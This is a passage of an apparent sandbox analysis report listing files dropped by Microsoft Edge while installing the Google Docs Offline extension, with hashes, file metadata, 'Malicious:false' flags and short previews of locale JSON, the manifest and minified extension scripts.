                                                        Preview:{.. "createnew": {.. "message": "..... ....... .........".. },.. "explanationofflinedisabled": {.. "message": ".......... ........... .... ....... ..... Google ......... .........., ...... .... ........... ......... ...., Google ... ................... ................ ......, ........ ......... ..........".. },.. "explanationofflineenabled": {.. "message": ".......... ..........., .......... .......... .......... ......... ........... ...... .....

                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7280_1839275086\CRX_INSTALL\_locales\te\messages.json

                                                        Download File
                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        File Type:JSON data
                                                        Category:dropped
                                                        Size (bytes):1969
                                                        Entropy (8bit):4.327258153043599
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:385E65EF723F1C4018EEE6E4E56BC03F
                                                        SHA1:0CEA195638A403FD99BAEF88A360BD746C21DF42
                                                        SHA-256:026C164BAE27DBB36A564888A796AA3F188AAD9E0C37176D48910395CF772CEA
                                                        SHA-512:E55167CB5638E04DF3543D57C8027B86B9483BFCAFA8E7C148EDED66454AEBF554B4C1CF3C33E93EC63D73E43800D6A6E7B9B1A1B0798B6BDB2F699D3989B052
                                                        Malicious:false
                                                        Reputation:unknown
                                                        Preview:{.. "createnew": {.. "message": "..... ...... ........ ......".. },.. "explanationofflinedisabled": {.. "message": ".... ........... ........ ......... ........ ....... Google Docs... .............., .... ............ ....... ..... ...... .... Google Docs .... ...... ............. ......, ........ ........ ... .......".. },.. "explanationofflineenabled": {.. "message": ".... ........... ......., .... .... ........ .......... .... ....... ..... ....... .... ..

                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7280_1839275086\CRX_INSTALL\_locales\th\messages.json

                                                        Download File
                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        File Type:JSON data
                                                        Category:dropped
                                                        Size (bytes):1674
                                                        Entropy (8bit):4.343724179386811
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:64077E3D186E585A8BEA86FF415AA19D
                                                        SHA1:73A861AC810DABB4CE63AD052E6E1834F8CA0E65
                                                        SHA-256:D147631B2334A25B8AA4519E4A30FB3A1A85B6A0396BC688C68DC124EC387D58
                                                        SHA-512:56DD389EB9DD335A6214E206B3BF5D63562584394D1DE1928B67D369E548477004146E6CB2AD19D291CB06564676E2B2AC078162356F6BC9278B04D29825EF0C
                                                        Malicious:false
                                                        Reputation:unknown
                                                        Preview:{.. "createnew": {.. "message": ".........".. },.. "explanationofflinedisabled": {.. "message": ".............. ............. Google .................................... ............................... Google ...... .................................................................".. },.. "explanationofflineenabled": {.. "message": "................................................................".. },.. "extdesc": {.. "message": "..... ..... ........

                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7280_1839275086\CRX_INSTALL\_locales\tr\messages.json

                                                        Download File
                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        File Type:JSON data
                                                        Category:dropped
                                                        Size (bytes):1063
                                                        Entropy (8bit):4.853399816115876
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:76B59AAACC7B469792694CF3855D3F4C
                                                        SHA1:7C04A2C1C808FA57057A4CCEEE66855251A3C231
                                                        SHA-256:B9066A162BEE00FD50DC48C71B32B69DFFA362A01F84B45698B017A624F46824
                                                        SHA-512:2E507CA6874DE8028DC769F3D9DFD9E5494C268432BA41B51568D56F7426F8A5F2E5B111DDD04259EB8D9A036BB4E3333863A8FC65AAB793BCEF39EDFE41403B
                                                        Malicious:false
                                                        Reputation:unknown
                                                        Preview:{.. "createnew": {.. "message": "YEN. OLU.TUR".. },.. "explanationofflinedisabled": {.. "message": ".nternet'e ba.l. de.ilsiniz. Google Dok.manlar'. .nternet ba.lant.s. olmadan kullanmak i.in, .nternet'e ba.lanabildi.inizde Google Dok.manlar ana sayfas.nda Ayarlar'a gidin ve .evrimd... senkronizasyonu etkinle.tirin.".. },.. "explanationofflineenabled": {.. "message": ".nternet'e ba.l. de.ilsiniz. Ancak, yine de mevcut dosyalar. d.zenleyebilir veya yeni dosyalar olu.turabilirsiniz.".. },.. "extdesc": {.. "message": "Dok.man, e-tablo ve sunu olu.turun, bunlar. d.zenleyin ve g.r.nt.leyin. T.m bu i.lemleri internet eri.imi olmadan yapabilirsiniz.".. },.. "extname": {.. "message": "Google Dok.manlar .evrimd...".. },.. "learnmore": {.. "message": "Daha Fazla Bilgi".. },.. "popuphelptext": {.. "message": ".nternet ba.lant.n.z olsun veya olmas.n, nerede olursan.z olun yaz.n, d.zenl

                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7280_1839275086\CRX_INSTALL\_locales\uk\messages.json

                                                        Download File
                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        File Type:JSON data
                                                        Category:dropped
                                                        Size (bytes):1333
                                                        Entropy (8bit):4.686760246306605
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:970963C25C2CEF16BB6F60952E103105
                                                        SHA1:BBDDACFEEE60E22FB1C130E1EE8EFDA75EA600AA
                                                        SHA-256:9FA26FF09F6ACDE2457ED366C0C4124B6CAC1435D0C4FD8A870A0C090417DA19
                                                        SHA-512:1BED9FE4D4ADEED3D0BC8258D9F2FD72C6A177C713C3B03FC6F5452B6D6C2CB2236C54EA972ECE7DBFD756733805EB2352CAE44BAB93AA8EA73BB80460349504
                                                        Malicious:false
                                                        Reputation:unknown
                                                        Preview:{.. "createnew": {.. "message": "........".. },.. "explanationofflinedisabled": {.. "message": ".. . ...... ....... ... ............. Google ........... ... ......... . .........., ......... . ............ .. ........ ........ Google .......... . ......... ......-............., .... ...... . .......".. },.. "explanationofflineenabled": {.. "message": ".. . ...... ......, ..... ... .... ...... .......... ........ ..... ... .......... .....".. },.. "extdesc": {.. "message": "........., ......... . ............ ........., .......... ....... .. ........... ... ....... .. ..........".. },.. "extname": {.. "message": "Goo

                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7280_1839275086\CRX_INSTALL\_locales\ur\messages.json

                                                        Download File
                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        File Type:JSON data
                                                        Category:dropped
                                                        Size (bytes):1263
                                                        Entropy (8bit):4.861856182762435
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:8B4DF6A9281333341C939C244DDB7648
                                                        SHA1:382C80CAD29BCF8AAF52D9A24CA5A6ECF1941C6B
                                                        SHA-256:5DA836224D0F3A96F1C5EB5063061AAD837CA9FC6FED15D19C66DA25CF56F8AC
                                                        SHA-512:FA1C015D4EA349F73468C78FDB798D462EEF0F73C1A762298798E19F825E968383B0A133E0A2CE3B3DF95F24C71992235BFC872C69DC98166B44D3183BF8A9E5
                                                        Malicious:false
                                                        Reputation:unknown
                                                        Preview:{.. "createnew": {.. "message": "... ......".. },.. "explanationofflinedisabled": {.. "message": ".. .. .... .... Google Docs .. .... ....... ..... ....... .... ..... .... ... .. .. ....... .. ..... ... .. Google Docs ... ... .. ....... .. ..... ... .. .... ...... ..... .. .. .....".. },.. "explanationofflineenabled": {.. "message": ".. .. .... ... .... .. ... ... ...... ..... ... ..... .. .... ... .. ... ..... ... .... ....".. },.. "extdesc": {.. "message": ".......... .......... ... ....... . .... ... ....... .. ..... .. .... ...... ..... .... ... ..... .......".. },.. "extname": {.. "message": "Google Docs .. ....".. },.. "learnmore": {..

                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7280_1839275086\CRX_INSTALL\_locales\vi\messages.json

                                                        Download File
                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        File Type:JSON data
                                                        Category:dropped
                                                        Size (bytes):1074
                                                        Entropy (8bit):5.062722522759407
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:773A3B9E708D052D6CBAA6D55C8A5438
                                                        SHA1:5617235844595D5C73961A2C0A4AC66D8EA5F90F
                                                        SHA-256:597C5F32BC999746BC5C2ED1E5115C523B7EB1D33F81B042203E1C1DF4BBCAFE
                                                        SHA-512:E5F906729E38B23F64D7F146FA48F3ABF6BAED9AAFC0E5F6FA59F369DC47829DBB4BFA94448580BD61A34E844241F590B8D7AEC7091861105D8EBB2590A3BEE9
                                                        Malicious:false
                                                        Reputation:unknown
                                                        Preview:{.. "createnew": {.. "message": "T.O M.I".. },.. "explanationofflinedisabled": {.. "message": "B.n .ang ngo.i tuy.n. .. s. d.ng Google T.i li.u m. kh.ng c.n k.t n.i Internet, .i ..n c.i ..t tr.n trang ch. c.a Google T.i li.u v. b.t ..ng b. h.a ngo.i tuy.n v.o l.n ti.p theo b.n ...c k.t n.i v.i m.ng Internet.".. },.. "explanationofflineenabled": {.. "message": "B.n .ang ngo.i tuy.n, tuy nhi.n b.n v.n c. th. ch.nh s.a c.c t.p c. s.n ho.c t.o c.c t.p m.i.".. },.. "extdesc": {.. "message": "Ch.nh s.a, t.o v. xem t.i li.u, b.ng t.nh v. b.n tr.nh b.y . t.t c. m. kh.ng c.n truy c.p Internet.".. },.. "extname": {.. "message": "Google T.i li.u ngo.i tuy.n".. },.. "learnmore": {.. "message": "Ti.m hi..u th.m".. },.. "popuphelptext": {.. "message": "Vi.t, ch.nh s.a v. c.ng t.c

                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7280_1839275086\CRX_INSTALL\_locales\zh_CN\messages.json

                                                        Download File
                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        File Type:JSON data
                                                        Category:dropped
                                                        Size (bytes):879
                                                        Entropy (8bit):5.7905809868505544
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:3E76788E17E62FB49FB5ED5F4E7A3DCE
                                                        SHA1:6904FFA0D13D45496F126E58C886C35366EFCC11
                                                        SHA-256:E72D0BB08CC3005556E95A498BD737E7783BB0E56DCC202E7D27A536616F5EE0
                                                        SHA-512:F431E570AB5973C54275C9EEF05E49E6FE2D6C17000F98D672DD31F9A1FAD98E0D50B5B0B9CF85D5BBD3B655B93FD69768C194C8C1688CB962AA75FF1AF9BDB6
                                                        Malicious:false
                                                        Reputation:unknown
                                                        Preview:{.. "createnew": {.. "message": "..".. },.. "explanationofflinedisabled": {.. "message": "....................... Google ................ Google ....................".. },.. "explanationofflineenabled": {.. "message": ".............................".. },.. "extdesc": {.. "message": "...................... - ........".. },.. "extname": {.. "message": "Google .......".. },.. "learnmore": {.. "message": "....".. },.. "popuphelptext": {.. "message": "...............................".. }..}..

                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7280_1839275086\CRX_INSTALL\_locales\zh_HK\messages.json

                                                        Download File
                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        File Type:JSON data
                                                        Category:dropped
                                                        Size (bytes):1205
                                                        Entropy (8bit):4.50367724745418
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:524E1B2A370D0E71342D05DDE3D3E774
                                                        SHA1:60D1F59714F9E8F90EF34138D33FBFF6DD39E85A
                                                        SHA-256:30F44CFAD052D73D86D12FA20CFC111563A3B2E4523B43F7D66D934BA8DACE91
                                                        SHA-512:D2225CF2FA94B01A7B0F70A933E1FDCF69CDF92F76C424CE4F9FCC86510C481C9A87A7B71F907C836CBB1CA41A8BEBBD08F68DBC90710984CA738D293F905272
                                                        Malicious:false
                                                        Reputation:unknown
                                                        Preview:{"createnew":{"message":"\u5efa\u7acb\u65b0\u9805\u76ee"},"explanationofflinedisabled":{"message":"\u60a8\u8655\u65bc\u96e2\u7dda\u72c0\u614b\u3002\u5982\u8981\u5728\u6c92\u6709\u4e92\u806f\u7db2\u9023\u7dda\u7684\u60c5\u6cc1\u4e0b\u4f7f\u7528\u300cGoogle \u6587\u4ef6\u300d\uff0c\u8acb\u524d\u5f80\u300cGoogle \u6587\u4ef6\u300d\u9996\u9801\u7684\u8a2d\u5b9a\uff0c\u4e26\u5728\u4e0b\u6b21\u9023\u63a5\u4e92\u806f\u7db2\u6642\u958b\u555f\u96e2\u7dda\u540c\u6b65\u529f\u80fd\u3002"},"explanationofflineenabled":{"message":"\u60a8\u8655\u65bc\u96e2\u7dda\u72c0\u614b\uff0c\u4f46\u60a8\u4ecd\u53ef\u4ee5\u7de8\u8f2f\u53ef\u7528\u6a94\u6848\u6216\u5efa\u7acb\u65b0\u6a94\u6848\u3002"},"extdesc":{"message":"\u7de8\u8f2f\u3001\u5efa\u7acb\u53ca\u67e5\u770b\u60a8\u7684\u6587\u4ef6\u3001\u8a66\u7b97\u8868\u548c\u7c21\u5831\uff0c\u5b8c\u5168\u4e0d\u9700\u4f7f\u7528\u4e92\u806f\u7db2\u3002"},"extname":{"message":"\u300cGoogle \u6587\u4ef6\u300d\u96e2\u7dda\u7248"},"learnmore":{"message":"\u77ad\u89e3\u8a

                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7280_1839275086\CRX_INSTALL\_locales\zh_TW\messages.json

                                                        Download File
                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        File Type:JSON data
                                                        Category:dropped
                                                        Size (bytes):843
                                                        Entropy (8bit):5.76581227215314
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:0E60627ACFD18F44D4DF469D8DCE6D30
                                                        SHA1:2BFCB0C3CA6B50D69AD5745FA692BAF0708DB4B5
                                                        SHA-256:F94C6DDEDF067642A1AF18D629778EC65E02B6097A8532B7E794502747AEB008
                                                        SHA-512:6FF517EED4381A61075AC7C8E80C73FAFAE7C0583BA4FA7F4951DD7DBE183C253702DEE44B3276EFC566F295DAC1592271BE5E0AC0C7D2C9F6062054418C7C27
                                                        Malicious:false
                                                        Reputation:unknown
                                                        Preview:{.. "createnew": {.. "message": ".....".. },.. "explanationofflinedisabled": {.. "message": ".................. Google ................ Google .................".. },.. "explanationofflineenabled": {.. "message": ".........................".. },.. "extdesc": {.. "message": ".............................".. },.. "extname": {.. "message": "Google .....".. },.. "learnmore": {.. "message": "....".. },.. "popuphelptext": {.. "message": "................................".. }..}..

                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7280_1839275086\CRX_INSTALL\_locales\zu\messages.json

                                                        Download File
                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        File Type:JSON data
                                                        Category:dropped
                                                        Size (bytes):912
                                                        Entropy (8bit):4.65963951143349
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:71F916A64F98B6D1B5D1F62D297FDEC1
                                                        SHA1:9386E8F723C3F42DA5B3F7E0B9970D2664EA0BAA
                                                        SHA-256:EC78DDD4CCF32B5D76EC701A20167C3FBD146D79A505E4FB0421FC1E5CF4AA63
                                                        SHA-512:30FA4E02120AF1BE6E7CC7DBB15FAE5D50825BD6B3CF28EF21D2F2E217B14AF5B76CFCC165685C3EDC1D09536BFCB10CA07E1E2CC0DA891CEC05E19394AD7144
                                                        Malicious:false
                                                        Reputation:unknown
                                                        Preview:{"createnew":{"message":"DALA ENTSHA"},"explanationofflinedisabled":{"message":"Awuxhunyiwe ku-inthanethi. Ukuze usebenzise i-Google Amadokhumenti ngaphandle koxhumano lwe-inthanethi, iya kokuthi izilungiselelo ekhasini lasekhaya le-Google Amadokhumenti bese uvula ukuvumelanisa okungaxhunyiwe ku-inthanethi ngesikhathi esilandelayo lapho uxhunywe ku-inthanethi."},"explanationofflineenabled":{"message":"Awuxhunyiwe ku-inthanethi, kodwa usangakwazi ukuhlela amafayela atholakalayo noma udale amasha."},"extdesc":{"message":"Hlela, dala, futhi ubuke amadokhumenti akho, amaspredishithi, namaphrezentheshini \u2014 konke ngaphandle kokufinyelela kwe-inthanethi."},"extname":{"message":"I-Google Amadokhumenti engaxhumekile ku-intanethi"},"learnmore":{"message":"Funda kabanzi"},"popuphelptext":{"message":"Bhala, hlela, futhi hlanganyela noma yikuphi lapho okhona, unalo noma ungenalo uxhumano lwe-inthanethi."}}.

                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7280_1839275086\CRX_INSTALL\_metadata\verified_contents.json

                                                        Download File
                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        File Type:JSON data
                                                        Category:dropped
                                                        Size (bytes):11280
                                                        Entropy (8bit):5.752941882424501
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:F897300492E3AB467E56883D23D02D77
                                                        SHA1:DECD6DC9E70ECCF9B45983147680614C019B99EA
                                                        SHA-256:F9B3A5747DEDCB5AED58FCFC0F4FD3BD2F2E903F2CCEF90A92A73DBC0F8C3DBD
                                                        SHA-512:B8AC574E24814BAF04A264E7F3F00B4285CD7B66104DFC77897440A898FCA5230775300EC7DEF723678975A04C2CD1BC73A44F77DA26262E8704029930990C62
                                                        Malicious:false
                                                        Reputation:unknown
                                                        Preview:[{"description":"treehash per file","signed_content":{"payload":"eyJjb250ZW50X2hhc2hlcyI6W3siYmxvY2tfc2l6ZSI6NDA5NiwiZGlnZXN0Ijoic2hhMjU2IiwiZmlsZXMiOlt7InBhdGgiOiIxMjgucG5nIiwicm9vdF9oYXNoIjoiZ2NWZy0xWWgySktRNVFtUmtjZGNmamU1dzVIc1JNN1ZCTmJyaHJ4eGZ5ZyJ9LHsicGF0aCI6Il9sb2NhbGVzL2FmL21lc3NhZ2VzLmpzb24iLCJyb290X2hhc2giOiJxaElnV3hDSFVNLWZvSmVFWWFiWWlCNU9nTm9ncUViWUpOcEFhZG5KR0VjIn0seyJwYXRoIjoiX2xvY2FsZXMvYW0vbWVzc2FnZXMuanNvbiIsInJvb3RfaGFzaCI6IlpPQWJ3cEs2THFGcGxYYjh4RVUyY0VkU0R1aVY0cERNN2lEQ1RKTTIyTzgifSx7InBhdGgiOiJfbG9jYWxlcy9hci9tZXNzYWdlcy5qc29uIiwicm9vdF9oYXNoIjoiUjJVaEZjdTVFcEJfUUZtU19QeGstWWRrSVZqd3l6WEoxdURVZEMyRE9BSSJ9LHsicGF0aCI6Il9sb2NhbGVzL2F6L21lc3NhZ2VzLmpzb24iLCJyb290X2hhc2giOiJZVVJ3Mmp4UU5Lem1TZkY0YS1xcTBzbFBSSFc4eUlXRGtMY2g4Ry0zdjJRIn0seyJwYXRoIjoiX2xvY2FsZXMvYmUvbWVzc2FnZXMuanNvbiIsInJvb3RfaGFzaCI6IjNmRm9XYUZmUHJNelRXSkJsMXlqbUlyRDZ2dzlsa1VxdzZTdjAyUk1oVkEifSx7InBhdGgiOiJfbG9jYWxlcy9iZy9tZXNzYWdlcy5qc29uIiwicm9vdF9oYXNoIjoiSXJ3M3RIem9xREx6bHdGa0hjTllOWFoyNmI0WWVwT2t4ZFN

                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7280_1839275086\CRX_INSTALL\dasherSettingSchema.json

                                                        Download File
                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        File Type:JSON data
                                                        Category:dropped
                                                        Size (bytes):854
                                                        Entropy (8bit):4.284628987131403
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:4EC1DF2DA46182103D2FFC3B92D20CA5
                                                        SHA1:FB9D1BA3710CF31A87165317C6EDC110E98994CE
                                                        SHA-256:6C69CE0FE6FAB14F1990A320D704FEE362C175C00EB6C9224AA6F41108918CA6
                                                        SHA-512:939D81E6A82B10FF73A35C931052D8D53D42D915E526665079EEB4820DF4D70F1C6AEBAB70B59519A0014A48514833FEFD687D5A3ED1B06482223A168292105D
                                                        Malicious:false
                                                        Reputation:unknown
                                                        Preview:{. "type": "object",. "properties": {. "allowedDocsOfflineDomains": {. "type": "array",. "items": {. "type": "string". },. "title": "Allow users to enable Docs offline for the specified managed domains.",. "description": "Users on managed devices will be able to enable docs offline if they are part of the specified managed domains.". },. "autoEnabledDocsOfflineDomains": {. "type": "array",. "items": {. "type": "string". },. "title": "Auto enable Docs offline for the specified managed domains in certain eligible situations.",. "description": "Users on managed devices, in certain eligible situations, will be able to automatically access and edit recent files offline for the managed domains set in this property. They can still disable it from Drive settings.". }. }.}.

                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7280_1839275086\CRX_INSTALL\manifest.json

                                                        Download File
                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        File Type:JSON data
                                                        Category:dropped
                                                        Size (bytes):2525
                                                        Entropy (8bit):5.417781191647272
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:35068E2550395A8A3E74558F2F4658DA
                                                        SHA1:BD6620054059BFB7A27A4FFF86B9966727F2C2B9
                                                        SHA-256:E2F418C816895E830541F48C0406B9398805E88B61A4EC816244154CD793743C
                                                        SHA-512:4BCB971D7353648ABF25ACA7A4A4771F62BBB76F8FC13BDE886F29826D9314F5101942492004FC719493604D317958B63A95CF5173F8180214F27D6BEA303F97
                                                        Malicious:false
                                                        Reputation:unknown
                                                        Preview:{.. "author": {.. "email": "docs-hosted-app-own@google.com".. },.. "background": {.. "service_worker": "service_worker_bin_prod.js".. },.. "content_capabilities": {.. "matches": [ "https://docs.google.com/*", "https://drive.google.com/*", "https://drive-autopush.corp.google.com/*", "https://drive-daily-0.corp.google.com/*", "https://drive-daily-1.corp.google.com/*", "https://drive-daily-2.corp.google.com/*", "https://drive-daily-3.corp.google.com/*", "https://drive-daily-4.corp.google.com/*", "https://drive-daily-5.corp.google.com/*", "https://drive-daily-6.corp.google.com/*", "https://drive-preprod.corp.google.com/*", "https://drive-staging.corp.google.com/*" ],.. "permissions": [ "clipboardRead", "clipboardWrite", "unlimitedStorage" ].. },.. "content_security_policy": {.. "extension_pages": "script-src 'self'; object-src 'self'".. },.. "default_locale": "en_US",.. "description": "__MSG_extDesc__",.. "externally_connectable": {.. "ma

                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7280_1839275086\CRX_INSTALL\offscreendocument.html

                                                        Download File
                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        File Type:HTML document, ASCII text
                                                        Category:dropped
                                                        Size (bytes):97
                                                        Entropy (8bit):4.862433271815736
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:B747B5922A0BC74BBF0A9BC59DF7685F
                                                        SHA1:7BF124B0BE8EE2CFCD2506C1C6FFC74D1650108C
                                                        SHA-256:B9FA2D52A4FFABB438B56184131B893B04655B01F336066415D4FE839EFE64E7
                                                        SHA-512:7567761BE4054FCB31885E16D119CD4E419A423FFB83C3B3ED80BFBF64E78A73C2E97AAE4E24AB25486CD1E43877842DB0836DB58FBFBCEF495BC53F9B2A20EC
                                                        Malicious:false
                                                        Reputation:unknown
                                                        Preview:<!DOCTYPE html>.<html>.<body>. <script src="offscreendocument_main.js"></script>.</body>.</html>

                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7280_1839275086\CRX_INSTALL\offscreendocument_main.js

                                                        Download File
                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        File Type:ASCII text, with very long lines (3700)
                                                        Category:dropped
                                                        Size (bytes):95606
                                                        Entropy (8bit):5.405749379350638
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:9D0EF4F7CB0306DCB7A7CDCD6DC2CCC7
                                                        SHA1:88D7F0A88C5807BFE00F13B612CC0522EEBE514A
                                                        SHA-256:E5E4392B21A21ECAFD27707BF70F95961B2656735A20B40BA54479D40EAB063C
                                                        SHA-512:34CD9AF9199DE606A531E98DB82BEAA5552E59BCCB2AB2BF49F82D6FA05425EB6936BC5F03BFC421AB6980B91395D9FDC5F0776882E1D49B3217CD35641FF906
                                                        Malicious:false
                                                        Reputation:unknown
                                                        Preview:'use strict';function aa(){return function(a){return a}}function ba(){return function(){}}function l(a){return function(){return this[a]}}function ca(a){return function(){return a}}var n;function da(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}}var ea=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};.function fa(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");}var q=fa(this);function r(a,b){if(b)a:{var c=q;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&ea(c,a,{configurable:!0,writable:!0,value:b})}}.r("Symbol",function(a){function b(f){if(this instanceof b)throw new Ty

                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7280_1839275086\CRX_INSTALL\page_embed_script.js

                                                        Download File
                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        File Type:ASCII text
                                                        Category:dropped
                                                        Size (bytes):291
                                                        Entropy (8bit):4.65176400421739
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:3AB0CD0F493B1B185B42AD38AE2DD572
                                                        SHA1:079B79C2ED6F67B5A5BD9BC8C85801F96B1B0F4B
                                                        SHA-256:73E3888CCBC8E0425C3D2F8D1E6A7211F7910800EEDE7B1E23AD43D3B21173F7
                                                        SHA-512:32F9DB54654F29F39D49F7A24A1FC800DBC0D4A8A1BAB2369C6F9799BC6ADE54962EFF6010EF6D6419AE51D5B53EC4B26B6E2CDD98DEF7CC0D2ADC3A865F37D3
                                                        Malicious:false
                                                        Reputation:unknown
                                                        Preview:(function(){window._docs_chrome_extension_exists=!0;window._docs_chrome_extension_features_version=2;window._docs_chrome_extension_permissions="alarms clipboardRead clipboardWrite storage unlimitedStorage offscreen".split(" ");window._docs_chrome_extension_manifest_version=3;}).call(this);.

                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7280_1839275086\CRX_INSTALL\service_worker_bin_prod.js

                                                        Download File
                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        File Type:ASCII text, with very long lines (3705)
                                                        Category:dropped
                                                        Size (bytes):104595
                                                        Entropy (8bit):5.385879258644142
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:4E0C47897BF98DEAC56F800942E150C4
                                                        SHA1:7903D30E0ACEE273724BDAA67446D9FD4E8460A5
                                                        SHA-256:FE76EA0C2F81E6140F38F4143B40BE85014B93FF80737600CFB39AEB5C8C6537
                                                        SHA-512:8B31463FC683439BAB5D4AEFE2BE0F6A9F5B695C2D95AFF3F842BFC74B10AE3D386D288121161506F74A08FB86D25C1096DA4177B768254BF84E83983982640F
                                                        Malicious:false
                                                        Reputation:unknown
                                                        Preview:'use strict';function aa(){return function(){}}function k(a){return function(){return this[a]}}function ba(a){return function(){return a}}var n;function ca(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}}var da=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};.function ea(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");}var q=ea(this);function r(a,b){if(b)a:{var c=q;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&da(c,a,{configurable:!0,writable:!0,value:b})}}.r("Symbol",function(a){function b(f){if(this instanceof b)throw new TypeError("Symbol is not a constructor");retu

                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7280_996867651\7300122d-d4d7-4725-9a56-6269ae43a66c.tmp

                                                        Download File
                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        File Type:Google Chrome extension, version 3
                                                        Category:dropped
                                                        Size (bytes):11185
                                                        Entropy (8bit):7.951995436832936
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:78E47DDA17341BED7BE45DCCFD89AC87
                                                        SHA1:1AFDE30E46997452D11E4A2ADBBF35CCE7A1404F
                                                        SHA-256:67D161098BE68CD24FEBC0C7B48F515F199DDA72F20AE3BBB97FCF2542BB0550
                                                        SHA-512:9574A66D3756540479DC955C4057144283E09CAE11CE11EBCE801053BB48E536E67DC823B91895A9E3EE8D3CB27C065D5E9030C39A26CBF3F201348385B418A5
                                                        Malicious:false
                                                        Reputation:unknown
                                                        Preview:Cr24..............0.."0...*.H.............0.........N.......E#......9e.u.q...VYY..@.+.C..k.O..bK.`..6.G..%.....3Z...e _.6....F..1p..K.Z......./ .3...OT..`..0...Y...FT..43.th.y...}....p.L...2S.&i.`..o...f.oH.....N..:..ijT.3.F{.0.,.f?'f.CQt;b_"Pc.. ..~S.I.c.8Z.;.....{G.a......k...>.`.o..%.$>;.....g.............jg?.R..@.:..........&..{...x@.Py..;kT....%F".S..w...N....9...A..@X.t!i.@..1;......1E..X.....[.~$....J......;=T.;)k..Y...$......S......M.P..P..>..=..u.....2p...w.9..1qw.a\A..Vj .C.....A..Cf1.r6.A...L. _m...[..l.Wr_../.. .B..9!.!+..ZG.K.......0.."0...*.H.............0.........^SUd%Q.L].......Cl2o...\[.....'*...;R=....N.C5....d. .....J.C>u.kr..Y..syJC.XS.q..E.n?....(G.5..)2.G..!.M.SS.{..U....!.EE..M[.#qs.A.1...g)nQ.c..G....Bd..7... .O.BI..KXQ..4.d.K.0......g.....-p....Z.E{...M&.~n.TE7..{0....5.#.C+3.y)pd9.e.........@..3.9..B.....I....2nX........2.?.~..S....]G.N.....Lr.O.Ve....9..D1.G..W)...P.?=.#..7.R.lz..a.wX.e..h.h.~....v..RP.@X....d.G

                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7280_996867651\CRX_INSTALL\_metadata\verified_contents.json

                                                        Download File
